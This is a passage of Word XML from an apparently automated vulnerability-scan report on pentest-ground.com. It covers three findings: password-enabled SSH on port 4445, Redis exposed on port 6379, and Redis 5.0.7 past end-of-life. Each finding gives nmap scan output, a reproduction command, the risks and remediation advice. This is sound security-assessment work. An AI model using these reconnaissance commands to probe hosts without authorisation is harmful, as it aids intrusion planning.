      <w:tr w:rsidR="00DD22C7" w14:paraId="7C2039FC" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B1052A3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C3F28F5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>pentest-ground.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="3E130E81" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="200B3516" wp14:editId="690061BC">
                  <wp:extent cx="1397000" cy="1397000"/>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607B1A1E" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B5D718E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ADA3BE9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
          <w:p w14:paraId="31394611" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Port: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="434343"/>
              </w:rPr>
              <w:t>4445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="7D41CDA4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DA5CF61" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D11BE51" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We managed to detect a publicly accessible SSH service.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableCodeblock"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="431045DD" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CBEE97C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>Starting Nmap ( https://nmap.org ) at 2025-01-30 09:15 EET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>Nmap scan report for pentest-ground.com (178.79.134.182)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>Host is up (0.00047s latency).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>rDNS record for 178.79.134.182: 178-79-134-182.ip.linodeusercontent.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>PORT     STATE SERVICE VERSION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>4445/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">| ssh-auth-methods: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">|   Supported authentication methods: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>|     publickey</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>|_    password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="625506E0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>How to reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F5A62D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableCodeblock"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="53660337" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54F4EE47" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>nmap -p 4445 -sV -n --script ssh-auth-methods --open pentest-ground.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B9644A1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED37A54" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We found that the SSH service with username/password authentication is publicly accessible. Network administrators often use remote administration protocols to control devices like switches, routers, and other essential systems. However, allowing these services to be accessible via the  Internet can increase security risks, creating potential opportunities for attacks on the organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3208B7F1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138560B6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Exposing this service online with username/password authentication can enable attackers to launch authentication attacks, like guessing login credentials, and potentially gaining unauthorized access. Vulnerabilities, such as unpatched software,  protocol flaws, or backdoors could also be exploited. An example is the CVE-2024-3094 (XZ Utils Backdoor) vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDBD684" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C19331" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We recommend turning off SSH with username/password authentication access over the Internet and instead using a Virtual Private Network (VPN) that mandates two-factor authentication (2FA). If the SSH service is essential for business purposes, we recommend limiting access only from designated IP addresses using a firewall. Furthermore, it is advisable to utilize SSH Public Key Authentication since it employs a key pair to verify the identity of a user or process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6738A7C6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03894321" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E1078E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEB9FC4" w14:textId="727BF668" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.10 Redis service exposed to the Internet</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="190DC154" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C5CD921" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01027FF0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>pentest-ground.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="57F2CF76" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EB253D8" wp14:editId="2A476A8C">
                  <wp:extent cx="1397000" cy="1397000"/>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risk.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId60"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1397000" cy="1397000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5B07F902" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FBE8231" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A956101" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
          <w:p w14:paraId="1FB7169E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Port: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="434343"/>
              </w:rPr>
              <w:t>6379</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="4DEB682A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BE8B531" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097BEF1F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We managed to detect a publicly accessible Redis service.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableCodeblock"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="47B7B2C7" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72913553" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>PORT STATE SERVICE VERSION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>6379/tcp open redis Redis key-value store 5.0.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D525F45" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>How to reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1DD840" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableCodeblock"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7477B300" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FFDBE3A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>nmap -p 6379 -sV -n --open pentest-ground.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F1AF179" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AE8D25" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We found that the Redis service is publicly accessible. This service often holds critical organizational data, making it a potential prime target for determined attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E698448" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71048EB4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk exists that an attacker exploits this issue by launching a password-based attack on the Redis service. If an attacker identifies a correct set of login details, they could gain access to the database and start enumerating, potentially revealing confidential information. Moreover, such vulnerabilities could lead to other forms of attacks, including privilege escalation, allowing attackers to run system commands and move laterally to other systems in the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E37358" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECCDCA5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We recommend ensuring that the Redis service is not publicly accessible. The Redis service should be safeguarded behind a firewall or made available only to users connected through a Virtual Private Network (VPN) server. However, if the Redis service is required to be directly accessible over the Internet, we recommend reconfiguring it such that it is accessible only from known IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44399270" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB3AD20" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0587AE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E32FCFE" w14:textId="307388A4" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.11 End-of-Life (EOL) found for Redis key-value store</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1F5592AB" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="052093DD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DD534DD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>pentest-ground.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="0759E93E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10CF57FA" wp14:editId="7D6EC07F">
                  <wp:extent cx="1397000" cy="1397000"/>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isk.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId88"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1397000" cy="1397000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6642E266" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30E864DE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E725BB5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
          <w:p w14:paraId="64351E65" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Port: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="434343"/>
              </w:rPr>
              <w:t>6379</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="64DBFB41" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EF45193" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEA4B2B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We managed to detect that Redis key-value store has reached the End-of-Life (EOL).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Version detected: 5.0.7</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>End-of-life date: 2022-04-27 Latest version for the cycle: 5.0.14</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>This release cycle (5.0) doesn't have long-term-support (LTS). The cycle was released on 2018-10-17 and its latest release date was 2021-10-04.  The support ended on 2020-04-30.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5052977F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8ACC1D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Using end-of-life (EOL) software poses significant security risks for organizations. EOL software no longer receives updates, including critical security patches. This creates a vulnerability landscape where known and potentially new security flaws remain unaddressed, making the software an attractive target for malicious actors. Attackers can exploit these vulnerabilities to gain unauthorized access, disrupt services, or steal sensitive data. Moreover, without updates, compatibility issues arise with newer technologies, leading to operational inefficiencies and increased potential for system failures.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Additionally, regulatory and compliance risks accompany the use of EOL software. Many industries have strict data protection regulations that require up-to-date software to ensure the highest security standards. Non-compliance can result in hefty fines and legal consequences. Organizations also risk damaging their reputation if a breach occurs due to outdated software, eroding customer trust and potentially leading to a loss of business. Therefore, continuing to use EOL software undermines both security posture and business integrity, necessitating timely upgrades and proactive risk management strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C53A5E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D0D14" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>To mitigate the risks associated with end-of-life (EOL) software, it's crucial to take proactive steps. Start by identifying any EOL software currently in use within your organization. Once identified, prioritize upgrading or replacing these applications with supported versions that receive regular updates and security patches. This not only helps close security gaps but also ensures better compatibility with newer technologies, enhancing overall system efficiency and reliability.Additionally, develop a comprehensive software lifecycle management plan. This plan should include regular audits to identify upcoming EOL dates and a schedule for timely updates or replacements. Train your IT staff and users about the importance of keeping software up to date and the risks associated with using outdated versions. By maintaining a proactive approach to software management, you can significantly reduce security risks, ensure compliance with industry regulations, and protect your organization's reputation and customer trust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CB8572" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CB1D57" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C314B8C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2C3BDD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
